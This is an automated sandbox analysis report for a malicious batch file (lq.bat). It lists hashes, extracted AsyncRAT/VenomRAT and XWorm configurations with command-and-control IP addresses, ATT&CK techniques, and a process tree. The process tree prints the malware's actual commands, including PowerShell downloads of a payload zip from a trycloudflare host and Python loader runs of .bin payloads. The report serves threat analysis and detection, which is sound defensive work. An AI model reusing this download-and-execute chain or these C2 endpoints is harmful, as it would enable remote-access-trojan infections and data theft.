asyncrat | bf0d1aa2019f057e23d62c1f8b69f63005a313057ff79592d2cdc28981c9d257

Analysis

max time kernel
142s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-12-2024 13:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lq.bat
Size

39KB
MD5

c052ebca60e2ce218b10804cb0cbc835
SHA1

cb24648a8bf6adb4807798d5cc6551bf1a9f148f
SHA256

bf0d1aa2019f057e23d62c1f8b69f63005a313057ff79592d2cdc28981c9d257
SHA512

e535443cb726ef0d52175cf7164aab93beddfa00c388793b199d64e5ac13cd8a8eb6e740c278b7845829fbdd452e5c8d65edc2e163149f080f7d4f10a96b44ab
SSDEEP

768:4yA400UEtvrU5cl7/2Vu2OHpi29NO150+5Rxbh:4yv+

Score

10^/10

asyncrat venomrat xworm default discovery execution rat trojan

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

111.90.143.248:4449

101.99.92.10:4449

Mutex

kqsjiymxwcmgkmn

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

111.90.143.248:3232

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

101.99.92.10:8066

Mutex

oUzmdOsTIy2HgRCx

Attributes

install_file
USB.exe

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4828-11165-0x0000000002A40000-0x0000000002A4E000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3612 created 3596	3612	python.exe	56
PID 4428 created 3596	4428	python.exe	56

VenomRAT 2 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/2700-11155-0x0000000002CF0000-0x0000000002D08000-memory.dmp	VenomRAT
behavioral2/memory/4776-11180-0x0000000000B90000-0x0000000000BA8000-memory.dmp	VenomRAT

Venomrat family
venomrat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral2/memory/2700-11155-0x0000000002CF0000-0x0000000002D08000-memory.dmp	family_asyncrat
behavioral2/memory/424-11162-0x0000000000A70000-0x0000000000A86000-memory.dmp	family_asyncrat
behavioral2/memory/4776-11180-0x0000000000B90000-0x0000000000BA8000-memory.dmp	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
22	1564	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4784	powershell.exe
1564	powershell.exe
748	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
3612	python.exe
4428	python.exe

Loads dropped DLL 12 IoCs

pid	Process
3612	python.exe
3612	python.exe
3612	python.exe
3612	python.exe
3612	python.exe
3612	python.exe
4428	python.exe
4428	python.exe
4428	python.exe
4428	python.exe
4428	python.exe
4428	python.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
2560	tasklist.exe
2208	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
784	msedge.exe
784	msedge.exe
3860	msedge.exe
3860	msedge.exe
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
4268	identity_helper.exe
4268	identity_helper.exe
4784	powershell.exe
4784	powershell.exe
4784	powershell.exe
2952	msedge.exe
2952	msedge.exe
2952	msedge.exe
2952	msedge.exe
3612	python.exe
4428	python.exe
2700	explorer.exe
2700	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3612	python.exe
4428	python.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	tasklist.exe
Token: SeDebugPrivilege	2208	tasklist.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	4784	powershell.exe
Token: SeDebugPrivilege	2700	explorer.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 3860	1388	cmd.exe	83
PID 1388 wrote to memory of 3860	1388	cmd.exe	83
PID 1388 wrote to memory of 2560	1388	cmd.exe	85
PID 1388 wrote to memory of 2560	1388	cmd.exe	85
PID 3860 wrote to memory of 3788	3860	msedge.exe	86
PID 3860 wrote to memory of 3788	3860	msedge.exe	86
PID 1388 wrote to memory of 3352	1388	cmd.exe	87
PID 1388 wrote to memory of 3352	1388	cmd.exe	87
PID 1388 wrote to memory of 2208	1388	cmd.exe	89
PID 1388 wrote to memory of 2208	1388	cmd.exe	89
PID 1388 wrote to memory of 3692	1388	cmd.exe	90
PID 1388 wrote to memory of 3692	1388	cmd.exe	90
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 1652	3860	msedge.exe	91
PID 3860 wrote to memory of 784	3860	msedge.exe	92
PID 3860 wrote to memory of 784	3860	msedge.exe	92
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93
PID 3860 wrote to memory of 1844	3860	msedge.exe	93

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lq.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.gtai.de/resource/blob/64100/e57f02360902a7b14996ebbc78579a75/20241010_IO_Automotive_WEB.pdf
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa3a2646f8,0x7ffa3a264708,0x7ffa3a264718
      4⤵
      PID:3788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
      4⤵
      PID:1652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
      4⤵
      PID:1844
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
      4⤵
      PID:2804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
      4⤵
      PID:1860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
      4⤵
      PID:2928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4172 /prefetch:6
      4⤵
      PID:3080
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
      4⤵
      PID:4388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
      4⤵
      PID:1116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
      4⤵
      PID:1416
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
      4⤵
      PID:428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
      4⤵
      PID:4120
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,15554053919332814506,322326442519841617,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3124 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2952
- - C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- - C:\Windows\system32\find.exe
    find /i "AvastUI.exe"
    3⤵
    PID:3352
- - C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq avgui.exe"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2208
- - C:\Windows\system32\find.exe
    find /i "avgui.exe"
    3⤵
    PID:3692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://robertson-glad-clip-illustrations.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "try { Expand-Archive -Path 'C:\Users\Admin\Downloads\downloaded.zip' -DestinationPath 'C:\Users\Admin\Downloads\Extracted' -Force } catch { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4784
- - C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe
    "C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe" load.py cc.bin
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:3612
- - C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe
    "C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe" load.py vv.bin
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    PID:4428
- - C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe
    "C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe" load.py pay.bin
    3⤵
    PID:1976
- - C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe
    "C:\Users\Admin\Downloads\Extracted\Python\Python312\python.exe" load.py payload.bin
    3⤵
    PID:2284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://robertson-glad-clip-illustrations.trycloudflare.com/a.txt' -OutFile 'C:\Users\Admin\Downloads\a.txt' } catch { exit 1 }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:748
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:424
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4828
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
179B

MD5
e78ee96076dfd21a7e1f3cac07bdf9eb

SHA1
5d6e36345315237895b436f90da1f80f9abce827

SHA256
037ef6fad3396d1bb5bc66d141cfb36455056c41be0f86be5c4800db043fd846

SHA512
f74d7baefb3c8bf26640c3384fe4052284eec3e0116f3c29518b2ef241123c0d99eb277363d80204d69b3ea960e0be79b8cefc868fc0c02e453346d39fb08ad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9d3a018bdad8102ce06da4974f63fca2

SHA1
a24b1a3eec75391d0a96842463c79cc55c96b4c9

SHA256
ef96da0c2f9a72ba9035912627ab64e65941fc92d019b6d9037fd9ff07860609

SHA512
cb95503cad6a7fa89198145201f74ffd3088b95d6e8de4dbcea4b9bf4a26d53fe88daf73668226d8e9058c00c85c336253a7bbd72d2eb635377b4ec0173ce063

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
01d02279e5dc8dbe9ab4a2fad273ad95

SHA1
7fc8891b5f9d0e73d612b0de9df1e9ab7a6bba3e

SHA256
2c67d4bc892b2e259021c283e0d7c612b4a06689372276e777ff7415db01a0ae

SHA512
5c593f29a062d12f5cc766fe09171b4fd3893afe9aa60c0c3868d1d63a910e840655498f6c01f4c95cc6aed9f3c478c7997ec921f6f01de69077896434abf7c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6dcf3c79d9f1282e7b60af68d847a6d7

SHA1
50b7490ff571ca642cdc17660f6d57d153411a21

SHA256
4b0058218d7d12a7688d1c8bf1aee96a35dedab91355aafe64127e45aa342bfe

SHA512
53a4d0b3e8f2b61fa4675252a15f79ed300f8c33799bbdf7aa87c7245ff04aa417b373aac86e0252d153872f4d9e37b25679248612c21e181c3d8b2ccf4d5cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fc28168b916bf9744961653d503e1164

SHA1
71deadab13b81a414582f931e9af010152463644

SHA256
a2a78e9fb30fe365d454ca6bbbf950355049c978262fdf0e80cd683622cf00e9

SHA512
08d828e18ccb2892f12dcbbaf5a5ffcafb4e2e768536fc46b3d2fce788c52b2f61058e1ef0a47e648e2308f4f1aeb8799bef9472726d2800fa9b775f401e08c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_23d0rndf.shp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Extracted\Python\Python312\Lib\__pycache__\_compat_pickle.cpython-312.pyc

Filesize
7KB

MD5
3872ae9c1c5ec9300c9b2ff6f1105fde

SHA1
2a0e2e9853d46d6fbb0b6ec8b430e86675e741da

SHA256
d587874e1e3539648124027cde7f8c119e21c0f32259c5c705c9e85c0a8f5681

SHA512
0a631067e89655e989759c955ab37de6e94a0794f84b305d4522598ffbbae55be4fe684510ad594e4f63f7056f69ea11b9845a1124dfafde17b5b37f512cb347

Download Submit
C:\Users\Admin\Downloads\Extracted\Python\Python312\Lib\__pycache__\ast.cpython-312.pyc

Filesize
97KB

MD5
306e2610072bf84935d37d77afb68844

SHA1
9f88ccbed04f488dec54f85fdbcb4f81400c1fe0

SHA256
d7c15a1d0c5397a49db50cd0382bdff7940a9ea2185ac9d34352731abc492e43

SHA512
c669bc7da9a08a6f0766949f9ad3b6be3d6eb3b6c92d5a7f0c7467ae0eb94f4dd6c1492d99fa927d0d516ff87a74d70d7c89f8fa9787ea47d69faaff67498487

Download Submit
C:\Users\Admin\Downloads\Extracted\Python\Python312\Lib\__pycache__\copyreg.cpython-312.pyc

Filesize
7KB

MD5
ce2ca41225b12167f2e1b2105176c212

SHA1
fc626ba1ff289f86aad710148ad66f0e9b8a442a

SHA256
d0faba5eef8f3570b444ac46814ba026eb98bb171a935ab64ccb29197a9a975f

SHA512
57629ce99ea6d7dcc66db49462016e87edad31272047d91836fda9c62039d86fdedde7d32c62ab87bee85b0d759de1c80c5a88fc3ba9fbe2870226f3b3f55b53

Download Submit
C:\Users\Admin\Downloads\Extracted\Python\Python312\Lib\__pycache__\enum.cpython-312.pyc

Filesize
78KB

MD5
c32c8d220f3becc50d05a1a9e7472616

SHA1
853fc8e7f0fd8143b253e15856bd3fff95e50ad4

SHA256
79b80e31ca1cb80814c4b04af1c38c1bde1165264487c0be40966ceb09afa965

SHA512
